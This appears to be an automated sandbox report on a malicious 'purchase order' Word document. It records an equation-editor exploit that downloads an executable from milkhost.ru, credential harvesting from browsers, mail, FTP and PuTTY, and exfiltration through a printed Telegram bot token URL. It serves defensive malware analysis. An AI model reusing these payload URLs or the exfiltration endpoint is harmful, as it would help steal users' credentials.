                      Source: Yara matchFile source: 4.2.godsawqop.exe.3320330.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.godsawqop.exe.3320330.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.godsawqop.exe.32ea110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.godsawqop.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2692, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: godsawqop.exe PID: 2236, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Windows Management Instrumentation211Valid Accounts1Valid Accounts1Disable or Modify Tools1OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsAccess Token Manipulation1Obfuscated Files or Information11Credentials in Registry1System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Masquerading1Security Account ManagerSecurity Software Discovery23SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationEncrypted Channel11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Valid Accounts1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsVirtualization/Sandbox Evasion141SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol24Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion141DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 502705 Sample: PO141021.doc Startdate: 14/10/2021 Architecture: WINDOWS Score: 100 29 Multi AV Scanner detection for domain / URL 2->29 31 Found malware configuration 2->31 33 Antivirus detection for URL or domain 2->33 35 11 other signatures 2->35 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 20 2->12         started        process3 dnsIp4 27 milkhost.ru 95.216.94.72, 49167, 80 HETZNER-ASDE Germany 7->27 21 C:\Users\user\AppData\Roaming\godsawqop.exe, PE32 7->21 dropped 23 C:\Users\user\AppData\Local\...\goshcj[1].exe, PE32 7->23 dropped 45 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->45 14 godsawqop.exe 2 7->14         started        file5 signatures6 process7 signatures8 47 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->47 49 Machine Learning detection for dropped file 14->49 51 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->51 53 2 other signatures 14->53 17 godsawqop.exe 12 2 14->17         started        process9 dnsIp10 25 api.telegram.org 149.154.167.220, 443, 49169 TELEGRAMRU United Kingdom 17->25 37 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->37 39 Tries to steal Mail credentials (via file access) 17->39 41 Tries to harvest and steal ftp login credentials 17->41 43 Tries to harvest and steal browser information (history, passwords, etc) 17->43 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO141021.doc39%VirustotalBrowse

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\godsawqop.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe100%Joe Sandbox ML

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.godsawqop.exe.400000.1.unpack100%AviraHEUR/AGEN.1138205Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      milkhost.ru8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://4hCltxiPdhpdC.com0%Avira URL Cloudsafe
                      http://milkhost.ru/trasper/goshcj.exe100%Avira URL Cloudmalware
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://mZWVLr.com0%Avira URL Cloudsafe
                      https://api.telegram.orgP0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      milkhost.ru
                      95.216.94.72
                      truetrueunknown
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://milkhost.ru/trasper/goshcj.exetrue
                        • Avira URL Cloud: malware
                        unknown
                        https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocumentfalse
                          high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://DynDns.comDynDNSgodsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.godsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmpfalse
                            high
                            https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/godsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpfalse
                              high
                              https://4hCltxiPdhpdC.comgodsawqop.exe, 00000005.00000002.724842747.000000000256A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.orggodsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpfalse
                                high
                                http://crl.entrust.net/server1.crl0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hagodsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://ocsp.entrust.net03godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://mZWVLr.comgodsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocumentdocument-----godsawqop.exe, 00000005.00000002.724727774.00000000024E1000.00000004.00000001.sdmpfalse
                                    high
                                    https://api.telegram.orgPgodsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.%s.comPAgodsawqop.exe, 00000005.00000002.725330787.0000000005DB0000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    low
                                    http://www.diginotar.nl/cps/pkioverheid0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://api.telegram.orggodsawqop.exe, 00000005.00000002.724989043.0000000002633000.00000004.00000001.sdmpfalse
                                      high
                                      http://ocsp.entrust.net0Dgodsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegodsawqop.exe, 00000005.00000002.724972605.000000000261E000.00000004.00000001.sdmpfalse
                                        high
                                        https://secure.comodo.com/CPS0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                          high
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipgodsawqop.exe, 00000004.00000002.461361637.00000000032EA000.00000004.00000001.sdmp, godsawqop.exe, 00000005.00000002.724051743.0000000000402000.00000040.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://crl.entrust.net/2048ca.crl0godsawqop.exe, 00000005.00000002.725109614.00000000049B8000.00000004.00000001.sdmpfalse
                                            high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            149.154.167.220
                                            api.telegram.orgUnited Kingdom
                                            62041TELEGRAMRUfalse
                                            95.216.94.72
                                            milkhost.ruGermany
                                            24940HETZNER-ASDEtrue

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:502705
                                            Start date:14.10.2021
                                            Start time:10:34:10
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 19s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:PO141021.doc
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winDOC@6/9@2/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 1% (good quality ratio 1%)
                                            • Quality average: 77.7%
                                            • Quality standard deviation: 21.4%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .doc
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                            • TCP Packets have been reduced to 100
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            10:35:15API Interceptor385x Sleep call for process: EQNEDT32.EXE modified
                                            10:35:17API Interceptor1398x Sleep call for process: godsawqop.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            149.154.167.220Purchase Order_0131021.docGet hashmaliciousBrowse
                                              SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                  invoice.exeGet hashmaliciousBrowse
                                                    Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                      Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                        Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                          21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                            SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                              R0987653400008789.exeGet hashmaliciousBrowse
                                                                T98765434567898.exeGet hashmaliciousBrowse
                                                                  LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                    photos jpg.exeGet hashmaliciousBrowse
                                                                      mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                        vbyltST1At.exeGet hashmaliciousBrowse
                                                                          PO B 12.exeGet hashmaliciousBrowse
                                                                            DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                              1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                                  PRESUPUESTO.xlsxGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    milkhost.ruPurchase_order_21518.docGet hashmaliciousBrowse
                                                                                    • 95.216.94.72
                                                                                    Purchase Order_122021.docGet hashmaliciousBrowse
                                                                                    • 95.216.94.72
                                                                                    Purchase Order_0190.doc__.rtfGet hashmaliciousBrowse
                                                                                    • 95.216.94.72
                                                                                    api.telegram.orgPurchase Order_0131021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    presupuesto.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    invoice.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    R0987653400008789.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    T98765434567898.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    photos jpg.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    vbyltST1At.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    PO B 12.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    1st file name DHL - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    DHL Shipping Documents REF - WAYBILL 44 7611 9546.pdf.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    TELEGRAMRUPurchase Order_0131021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    6GKjXSaJ8E.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99
                                                                                    SecuriteInfo.com.Suspicious.Win32.Save.a.2604.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    invoice.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Ff24G0gf7c.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    21ITQXL080104122T7.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    JetCe3om9L.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99
                                                                                    frj4kNTbl3.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99
                                                                                    F6RhtCVeTD.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99
                                                                                    SWIFT_BANKTIA_729928920222.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    R0987653400008789.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    T98765434567898.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    LbmGlrja1Z.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    photos jpg.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    ET13QJzgLL.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99
                                                                                    mGaZYvxAsr.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    install.exeGet hashmaliciousBrowse
                                                                                    • 149.154.167.99

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    36f7277af969a6947a61ae0b815907a1Purchase Order_0131021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Order EQE0905.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Nuevo pedido de consulta cotizacin.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Order EQE090.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    PO2008095.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Order List.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    DHL Original Documents.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Purchase Order List.xlsmGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    img_Especificaci#U00f3n_07102021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    Purchase Order_0190.doc__.rtfGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    PO. 2100002.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    TT remittance.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    TT form.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    04OCT2021-USD-178,750.00.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    especificaci#U00f3n 0021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    RF Quotation_04102021.docGet hashmaliciousBrowse
                                                                                    • 149.154.167.220
                                                                                    SteelTrading PO-5579.xlsx.xlsxGet hashmaliciousBrowse
                                                                                    • 149.154.167.220

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\goshcj[1].exe
                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:downloaded
                                                                                    Size (bytes):486912
                                                                                    Entropy (8bit):6.762794264214071
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:yUfjnaH1FrQKkmWSc/kmGBbxiB7C7r/vHMUHvVgqA:irlkmWdGNxih2MUHvVgqA
                                                                                    MD5:D1BAA9515F4C67A7B561938BBD81BC75
                                                                                    SHA1:E83E455F636443C9F62D8C480FF060F7BB6DE3BE
                                                                                    SHA-256:1FAC59451F582122CB2E5787E3A936A3001081DE3469E168207DA1A357DF691D
                                                                                    SHA-512:2FC1E9B771191C52794F99AE1C1CAF70100C2A129634CA230EFA4007145C27D8AE7997AF83B6077BB6702B0D85EEB9F5429096ADAE6D2CC0601DCE0F4F5E171D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Reputation:low
                                                                                    IE Cache URL:http://milkhost.ru/trasper/goshcj.exe
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..W.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H..................\....B...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....rKH.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....rOH.p~B...raH.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0008E59B-A89A-4382-AC7E-24705A8EB889}.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1024
                                                                                    Entropy (8bit):0.05390218305374581
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{773917BE-1BC4-4D2D-91B8-39B324F718F3}.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):188416
                                                                                    Entropy (8bit):3.863555498453346
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:efwcruMprFaUi6TlpCM1s6xgDAQ37OH1Tf2JQx8sx3B5hYxILSD+Kh+:+wwB1lpQLRq95YeLyQ
                                                                                    MD5:6F3F057D88CECCF9A365CA5B6DEA867A
                                                                                    SHA1:359FF3E3FCF0B92D4F8703ECCACF2FF20437ED40
                                                                                    SHA-256:78F1AFC66317FD0069BD6E39ABAC20B93CBC7DB466DD7BB4628AA5A721B899F9
                                                                                    SHA-512:43238DCB962090162A0E487ED848A3A4A05B8C1BF95A5354EAD872A86341318E42FAEE86946DAF9E2AB6EA4C682785FD7E8C443DB6606169A775DC92F49F7A38
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: ;.'.......?.?.`...%.0.~...[.1._.|.|.?.?.?.?.!...5.|.[.!.9.0.1.1.<.).?.=.,.3.8.<.,.%.<.^.%...?.[.].6.>.+.:.?...;.5.?.#.4.....`.?.,.<.,.^./.|.<...^.).0.8...?.?.9.$.7.8.].&.=.=.-.5.).(.?.?.`.,.@.7.!.?.[.#.4._.=.1.2.-...<.&.!...1.?.@.].(.>.%.#.@.[.7.-.5.^.+.?.9.2.@.6.4.~.%.?...+.<.$.?.[.3.8.=.4./.6.2.;...=.[.9.6.6.|.@...;./.^.2.*...].`.1.*.8.%./.+.:.).~...2.!.:.~.9.9._.].~.3.%...$.5.0.<.5.0.3.6.?.2.7...1.=.;.3.$.=.(...2.8./.?.9.-.%._.%.+._.?.-./.&.<.3.0...$.'.[.@.:...=.&...&.^._./.?.|.?.?.:.|.5.|.3.-.%._.0.5.#.<.#.;.1.6...^.(.<.<.?...)...+.3.`.@.%.^.!.5...-.,.).?.%.:.%.4.-.3.?.~.4.&.?...(.^.4.>.0.^.$...*.&.*.!.,.$.3.....1.0...?.8.:.'.4.;.6.@.%.~.*./.?.*.+.4.^.=.^.~.,.%.4.&.^.|...2...].7.0.7.8.1.?.).@.`.)...?.2.?.?.7.~.+.~.'.]./.!.0.?.%.0.6.0.7.).6.2.+.4.6.].[.:./.?.<.>.2.^.(.^.).?.?.%...'...9.!.=.+.1.....8.?.>...?.!./.|.+.[.^.'.;.5...?.1.1.-.:.6.#.,.8.$.*.#.[.<.8.].7.|.9.'.].;.?.`._.3.^.1.3.).;. . . . . . . . . . . . . . . . . . . . . . . . . . . .3.2.3.0.2.2.4. . . . . . . . . . . . . . .
                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7764CFCD-FF48-436A-A353-8D268E618EA5}.tmp
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1536
                                                                                    Entropy (8bit):1.3565081771358332
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mzr
                                                                                    MD5:668274F9187FAC2D76E23525BEF15CD1
                                                                                    SHA1:B6A89CC80F72A923F0E9C817976863E1182495E5
                                                                                    SHA-256:70913B160A34D6E68EAB50D1FE24F466A668F6EDC2D3B9E35B308E50F7AAF1DD
                                                                                    SHA-512:04068962E92E047FC820DC225FB910C2D61A12768D39FBE30A7D80A50CA7340D601AF258A0B8558553551CCC093D1B44F243C2CA4D5F3B1059A3CE623D4C9587
                                                                                    Malicious:false
                                                                                    Reputation:low
